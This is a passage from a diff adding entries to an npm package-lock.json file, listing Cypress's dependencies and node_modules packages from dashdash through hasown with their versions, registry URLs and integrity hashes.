"^2.0.2", + "bluebird": "^3.7.2", + "buffer": "^5.7.1", + "cachedir": "^2.3.0", + "chalk": "^4.1.0", + "check-more-types": "^2.24.0", + "cli-cursor": "^3.1.0", + "cli-table3": "~0.6.1", + "commander": "^6.2.1", + "common-tags": "^1.8.0", + "dayjs": "^1.10.4", + "debug": "^4.3.4", + "enquirer": "^2.3.6", + "eventemitter2": "6.4.7", + "execa": "4.1.0", + "executable": "^4.1.1", + "extract-zip": "2.0.1", + "figures": "^3.2.0", + "fs-extra": "^9.1.0", + "getos": "^3.2.1", + "is-ci": "^3.0.1", + "is-installed-globally": "~0.4.0", + "lazy-ass": "^1.6.0", + "listr2": "^3.8.3", + "lodash": "^4.17.21", + "log-symbols": "^4.0.0", + "minimist": "^1.2.8", + "ospath": "^1.2.2", + "pretty-bytes": "^5.6.0", + "process": "^0.11.10", + "proxy-from-env": "1.0.0", + "request-progress": "^3.0.0", + "semver": "^7.5.3", + "supports-color": "^8.1.1", + "tmp": "~0.2.3", + "untildify": "^4.0.0", + "yauzl": "^2.10.0" + }, + "bin": { + "cypress": "bin/cypress" + }, + "engines": { + "node": "^16.0.0 || ^18.0.0 
|| >=20.0.0" + } + }, + "node_modules/cypress/node_modules/supports-color": { + "version": "8.1.1", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", + "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/supports-color?sponsor=1" + } + }, + "node_modules/dashdash": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", + "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", + "dependencies": { + "assert-plus": "^1.0.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/dayjs": { + "version": "1.11.10", + "resolved": "https://registry.npmjs.org/dayjs/-/dayjs-1.11.10.tgz", + "integrity": "sha512-vjAczensTgRcqDERK0SR2XMwsF/tSvnvlv6VcF2GIhg6Sx4yOIt/irsr1RDJsKiIyBzJDpCoXiWWq28MqH2cnQ==" + }, + "node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/decompress-response": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-6.0.0.tgz", + "integrity": "sha512-aW35yZM6Bb/4oJlZncMH2LCoZtJXTRxES17vE3hoRiowU2kWHaJKFkSBDnDR+cm9J+9QhXmREyIfv0pji9ejCQ==", + "dependencies": { + "mimic-response": "^3.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/deep-equal": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/deep-equal/-/deep-equal-2.2.2.tgz", + "integrity": "sha512-xjVyBf0w5vH0I42jdAZzOKVldmPgSulmiyPRywoyq7HXC9qdgo17kxJE+rdnif5Tz6+pIrpJI8dCpMNLIGkUiA==", + "dependencies": { + "array-buffer-byte-length": "^1.0.0", + "call-bind": "^1.0.2", + "es-get-iterator": "^1.1.3", + "get-intrinsic": "^1.2.1", + "is-arguments": "^1.1.1", + "is-array-buffer": "^3.0.2", + "is-date-object": "^1.0.5", + "is-regex": "^1.1.4", + "is-shared-array-buffer": "^1.0.2", + "isarray": "^2.0.5", + "object-is": "^1.1.5", + "object-keys": "^1.1.1", + "object.assign": "^4.1.4", + "regexp.prototype.flags": "^1.5.0", + "side-channel": "^1.0.4", + "which-boxed-primitive": "^1.0.2", + "which-collection": "^1.0.1", + "which-typed-array": "^1.1.9" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/define-data-property": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/define-data-property/-/define-data-property-1.1.1.tgz", + "integrity": "sha512-E7uGkTzkk1d0ByLeSc6ZsFS79Axg+m1P/VsgYsxHgiuc3tFSj+MjMIwe90FC4lOAZzNBdY7kkO2P2wKdsQ1vgQ==", + "dependencies": { + "get-intrinsic": "^1.2.1", + "gopd": "^1.0.1", + "has-property-descriptors": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/define-properties": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/define-properties/-/define-properties-1.2.1.tgz", + "integrity": "sha512-8QmQKqEASLd5nx0U1B1okLElbUuuttJ/AnYmRXbbbGDWh6uS208EjD4Xqq/I9wK7u0v6O08XhTWnt5XtEbR6Dg==", + "dependencies": { + "define-data-property": "^1.0.1", + "has-property-descriptors": "^1.0.0", + 
"object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/destroy": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz", + "integrity": "sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg==", + "engines": { + "node": ">= 0.8", + "npm": "1.2.8000 || >= 1.4.16" + } + }, + "node_modules/diff3": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/diff3/-/diff3-0.0.3.tgz", + "integrity": "sha512-iSq8ngPOt0K53A6eVr4d5Kn6GNrM2nQZtC740pzIriHtn4pOQ2lyzEXQMBeVcWERN0ye7fhBsk9PbLLQOnUx/g==" + }, + "node_modules/dom-accessibility-api": { + "version": "0.5.16", + "resolved": "https://registry.npmjs.org/dom-accessibility-api/-/dom-accessibility-api-0.5.16.tgz", + "integrity": "sha512-X7BJ2yElsnOJ30pZF4uIIDfBEVgF4XEBxL9Bxhy6dnrm5hkzqmsWHGTiHqRiITNhMyFLyAiWndIJP7Z1NTteDg==" + }, + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "dependencies": { + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/ecc-jsbn": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", + "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", + "dependencies": { + "jsbn": "~0.1.0", + "safer-buffer": "^2.1.0" + } + }, + "node_modules/ee-first": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz", + "integrity": "sha512-WMwm9LhRUo+WUaRN+vRuETqG89IgZphVSNkdFgeb6sS/E4OrDIN7t48CAewSHXc6C8lefD8KKfr5vY61brQlow==" + }, + "node_modules/emoji-regex": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + }, + "node_modules/encodeurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz", + "integrity": "sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", + "dependencies": { + "once": "^1.4.0" + } + }, + "node_modules/enquirer": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/enquirer/-/enquirer-2.4.1.tgz", + "integrity": 
"sha512-rRqJg/6gd538VHvR3PSrdRBb/1Vy2YfzHqzvbhGIQpDRKIa4FgV/54b5Q1xYSxOOwKvjXweS26E0Q+nAMwp2pQ==", + "dependencies": { + "ansi-colors": "^4.1.1", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8.6" + } + }, + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-get-iterator": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/es-get-iterator/-/es-get-iterator-1.1.3.tgz", + "integrity": "sha512-sPZmqHBe6JIiTfN5q2pEi//TwxmAFHwj/XEuYjTuse78i8KxaqMTTzxPoFKuzRpDpTJ+0NAbpfenkmH2rePtuw==", + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.1.3", + "has-symbols": "^1.0.3", + "is-arguments": "^1.1.1", + "is-map": "^2.0.2", + "is-set": "^2.0.2", + "is-string": "^1.0.7", + "isarray": "^2.0.5", + "stop-iteration-iterator": "^1.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/escape-html": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz", + "integrity": "sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow==" + }, + "node_modules/escape-string-regexp": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", + "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/etag": { + "version": "1.8.1", + "resolved": "https://registry.npmjs.org/etag/-/etag-1.8.1.tgz", + "integrity": "sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/eventemitter2": { + "version": "6.4.7", + "resolved": "https://registry.npmjs.org/eventemitter2/-/eventemitter2-6.4.7.tgz", + "integrity": "sha512-tYUSVOGeQPKt/eC1ABfhHy5Xd96N3oIijJvN3O9+TsC28T5V9yX9oEfEK5faP0EFSNVOG97qtAS68GBrQB2hDg==" + }, + "node_modules/execa": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/execa/-/execa-4.1.0.tgz", + "integrity": "sha512-j5W0//W7f8UxAn8hXVnwG8tLwdiUy4FJLcSupCg6maBYZDpyBvTApK7KyuI4bKj8KOh1r2YH+6ucuYtJv1bTZA==", + "dependencies": { + "cross-spawn": "^7.0.0", + "get-stream": "^5.0.0", + "human-signals": "^1.1.1", + "is-stream": "^2.0.0", + "merge-stream": "^2.0.0", + "npm-run-path": "^4.0.0", + "onetime": "^5.1.0", + "signal-exit": "^3.0.2", + "strip-final-newline": "^2.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sindresorhus/execa?sponsor=1" + } + }, + "node_modules/executable": { + "version": "4.1.1", + "resolved": 
"https://registry.npmjs.org/executable/-/executable-4.1.1.tgz", + "integrity": "sha512-8iA79xD3uAch729dUG8xaaBBFGaEa0wdD2VkYLFHwlqosEj/jT66AzcreRDSgV7ehnNLBW2WR5jIXwGKjVdTLg==", + "dependencies": { + "pify": "^2.2.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/express": { + "version": "4.21.2", + "resolved": "https://registry.npmjs.org/express/-/express-4.21.2.tgz", + "integrity": "sha512-28HqgMZAmih1Czt9ny7qr6ek2qddF4FclbMzwhCREB6OFfH+rXAnuNCwo1/wFvrtbgsQDb4kSbX9de9lFbrXnA==", + "dependencies": { + "accepts": "~1.3.8", + "array-flatten": "1.1.1", + "body-parser": "1.20.3", + "content-disposition": "0.5.4", + "content-type": "~1.0.4", + "cookie": "0.7.1", + "cookie-signature": "1.0.6", + "debug": "2.6.9", + "depd": "2.0.0", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "finalhandler": "1.3.1", + "fresh": "0.5.2", + "http-errors": "2.0.0", + "merge-descriptors": "1.0.3", + "methods": "~1.1.2", + "on-finished": "2.4.1", + "parseurl": "~1.3.3", + "path-to-regexp": "0.1.12", + "proxy-addr": "~2.0.7", + "qs": "6.13.0", + "range-parser": "~1.2.1", + "safe-buffer": "5.2.1", + "send": "0.19.0", + "serve-static": "1.16.2", + "setprototypeof": "1.2.0", + "statuses": "2.0.1", + "type-is": "~1.6.18", + "utils-merge": "1.0.1", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.10.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/express" + } + }, + "node_modules/express/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/express/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/express/node_modules/qs": { + "version": "6.13.0", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.13.0.tgz", + "integrity": "sha512-+38qI9SOr8tfZ4QmJNplMUxqjbe7LKvvZgWdExBOmd+egZTtjLB67Gu0HRX3u/XOq7UU2Nx6nsjvS16Z9uwfpg==", + "dependencies": { + "side-channel": "^1.0.6" + }, + "engines": { + "node": ">=0.6" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/extend": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", + "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" + }, + "node_modules/extract-zip": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extract-zip/-/extract-zip-2.0.1.tgz", + "integrity": "sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg==", + "dependencies": { + "debug": "^4.1.1", + "get-stream": "^5.1.0", + "yauzl": "^2.10.0" + }, + "bin": { + "extract-zip": "cli.js" + }, + "engines": { + "node": ">= 10.17.0" + }, + "optionalDependencies": { + "@types/yauzl": "^2.9.1" + } + }, + "node_modules/extsprintf": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", + "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", + "engines": [ + "node >=0.6.0" + ] + }, + "node_modules/fast-text-encoding": { + "version": "1.0.6", + "resolved": 
"https://registry.npmjs.org/fast-text-encoding/-/fast-text-encoding-1.0.6.tgz", + "integrity": "sha512-VhXlQgj9ioXCqGstD37E/HBeqEGV/qOD/kmbVG8h5xKBYvM1L3lR1Zn4555cQ8GkYbJa8aJSipLPndE1k6zK2w==" + }, + "node_modules/fd-slicer": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/fd-slicer/-/fd-slicer-1.1.0.tgz", + "integrity": "sha512-cE1qsB/VwyQozZ+q1dGxR8LBYNZeofhEdUNGSMbQD3Gw2lAzX9Zb3uIU6Ebc/Fmyjo9AWWfnn0AUCHqtevs/8g==", + "dependencies": { + "pend": "~1.2.0" + } + }, + "node_modules/figures": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/figures/-/figures-3.2.0.tgz", + "integrity": "sha512-yaduQFRKLXYOGgEn6AZau90j3ggSOyiqXU0F9JZfeXYhNa+Jk4X+s45A2zg5jns87GAFa34BBm2kXw4XpNcbdg==", + "dependencies": { + "escape-string-regexp": "^1.0.5" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/finalhandler": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.1.tgz", + "integrity": "sha512-6BN9trH7bp3qvnrRyzsBz+g3lZxTNZTbVO2EV1CS0WIcDbawYVdYvGflME/9QP0h0pYlCDBCTjYa9nZzMDpyxQ==", + "dependencies": { + "debug": "2.6.9", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "on-finished": "2.4.1", + "parseurl": "~1.3.3", + "statuses": "2.0.1", + "unpipe": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/finalhandler/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/finalhandler/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/for-each": { + "version": "0.3.3", + "resolved": "https://registry.npmjs.org/for-each/-/for-each-0.3.3.tgz", + "integrity": "sha512-jqYfLp7mo9vIyQf8ykW2v7A+2N4QjeCeI5+Dz9XraiO1ign81wjiH7Fb9vSOWvQfNtmSa4H2RoQTrrXivdUZmw==", + "dependencies": { + "is-callable": "^1.1.3" + } + }, + "node_modules/forever-agent": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", + "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", + "engines": { + "node": "*" + } + }, + "node_modules/form-data": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", + "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.6", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 0.12" + } + }, + "node_modules/forwarded": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz", + "integrity": "sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/fresh": { + "version": "0.5.2", + "resolved": "https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz", + "integrity": "sha512-zJ2mQYM18rEFOudeV4GShTGIQ7RbzA7ozbU9I/XBpm7kqgMywgmylMwXHxZJmkVoYkna9d2pVXVXPdYTP9ej8Q==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/fs-extra": { + "version": "9.1.0", + "resolved": 
"https://registry.npmjs.org/fs-extra/-/fs-extra-9.1.0.tgz", + "integrity": "sha512-hcg3ZmepS30/7BSFqRvoo3DOMQu7IjqxO5nCDt+zM9XWjb33Wg7ziNT+Qvqbuc3+gWpzO02JubVyk2G4Zvo1OQ==", + "dependencies": { + "at-least-node": "^1.0.0", + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/functions-have-names": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/functions-have-names/-/functions-have-names-1.2.3.tgz", + "integrity": "sha512-xckBUXyTIqT97tq2x2AMb+g163b5JFysYk0x4qxNFwbfQkmNZoiRHb6sPzI9/QV33WeuvVYBUIiD4NzNIyqaRQ==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "dependencies": { + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/get-stream": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-5.2.0.tgz", + "integrity": "sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==", + "dependencies": { + "pump": "^3.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/getos": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/getos/-/getos-3.2.1.tgz", + "integrity": "sha512-U56CfOK17OKgTVqozZjUKNdkfEv6jk5WISBJ8SHoagjE6L69zOwl3Z+O8myjY9MEW3i2HPWQBt/LTbCgcC973Q==", + "dependencies": { + "async": "^3.2.0" + } + }, + "node_modules/getpass": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", + "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", + "dependencies": { + "assert-plus": "^1.0.0" + } + }, + "node_modules/global-dirs": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/global-dirs/-/global-dirs-3.0.1.tgz", + "integrity": "sha512-NBcGGFbBA9s1VzD41QXDG+3++t9Mn5t1FpLdhESY6oKY4gYTFpX4wO3sqGUa0Srjtbfj3szX0RnemmrVRUdULA==", + "dependencies": { + "ini": "2.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + 
"integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==" + }, + "node_modules/has-bigints": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-bigints/-/has-bigints-1.0.2.tgz", + "integrity": "sha512-tSvCKtBr9lkF0Ex0aQiP9N+OpV4zi2r/Nee5VkRDbaqv35RLYMzbwQfFSZZH0kR+Rd6302UJZ2p/bJCEoR3VoQ==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/has-property-descriptors": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/has-property-descriptors/-/has-property-descriptors-1.0.1.tgz", + "integrity": "sha512-VsX8eaIewvas0xnvinAe9bw4WfIeODpGYikiWYLH+dma0Jw6KHYqWiWfhQlgOVK8D6PvjubK5Uc4P0iIhIcNVg==", + "dependencies": { + "get-intrinsic": "^1.2.2" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-tostringtag": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.0.tgz", + "integrity": "sha512-kFjcSNhnlGV1kyoGk7OXKSawH5JOb/LzUc5w9B02hOTO0dfFRjbHQKvg1d6cf3HbeUmtU9VbbV3qzZ2Teh97WQ==", + "dependencies": { + "has-symbols": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/hasown": { + "version": "2.0.2", 